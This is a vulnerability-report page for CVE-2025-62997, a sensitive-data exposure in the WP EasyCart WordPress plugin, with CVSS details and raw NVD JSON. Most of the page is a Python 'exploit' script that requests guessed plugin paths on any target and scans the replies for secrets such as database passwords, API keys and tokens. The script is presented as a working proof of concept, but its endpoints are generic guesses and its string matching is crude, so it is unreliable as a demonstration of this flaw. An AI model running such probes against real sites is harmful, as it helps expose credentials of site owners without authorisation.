Security Vulnerability Report
中文
CVE-2025-62997 CVSS 5.3 MEDIUM

CVE-2025-62997

Published: 2025-12-09 16:18:05
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Retrieve Embedded Sensitive Data.This issue affects WP EasyCart: from n/a through <= 5.8.11.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP EasyCart <= 5.8.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62997 PoC - WP EasyCart Sensitive Information Exposure # This PoC demonstrates the information disclosure vulnerability import requests import sys def exploit_wp_easycart(target_url): """ Exploit for CVE-2025-62997: WP EasyCart Sensitive Information Exposure """ # Common vulnerable endpoints in WP EasyCart vulnerable_paths = [ '/wp-admin/admin-ajax.php', '/wp-content/plugins/wp-easycart/inc/php/setup.php', '/wp-content/plugins/wp-easycart/inc/php/ajax.php', '/?ec_page=checkout&step=3', '/wp-content/uploads/wpeasycart/products/' ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-62997\n") for path in vulnerable_paths: url = target_url.rstrip('/') + path print(f"[*] Testing: {url}") try: response = requests.get(url, timeout=10, verify=False) # Check for sensitive information patterns sensitive_patterns = [ b'DB_NAME', b'DB_USER', b'DB_PASSWORD', b'DB_HOST', b'password', b'api_key', b'secret', b'token', b'wp-config', b'localhost', b'127.0.0.1' ] for pattern in sensitive_patterns: if pattern in response.content: print(f"[+] POTENTIAL VULNERABILITY: Found sensitive data pattern: {pattern.decode()}") print(f"[+] URL: {url}") print(f"[+] Status: {response.status_code}") return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("\n[*] Scan complete. No obvious vulnerabilities detected.") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] exploit_wp_easycart(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62997", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:05.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Retrieve Embedded Sensitive Data.This issue affects WP EasyCart: from n/a through <= 5.8.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-easycart/vulnerability/wordpress-wp-easycart-plugin-5-8-11-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}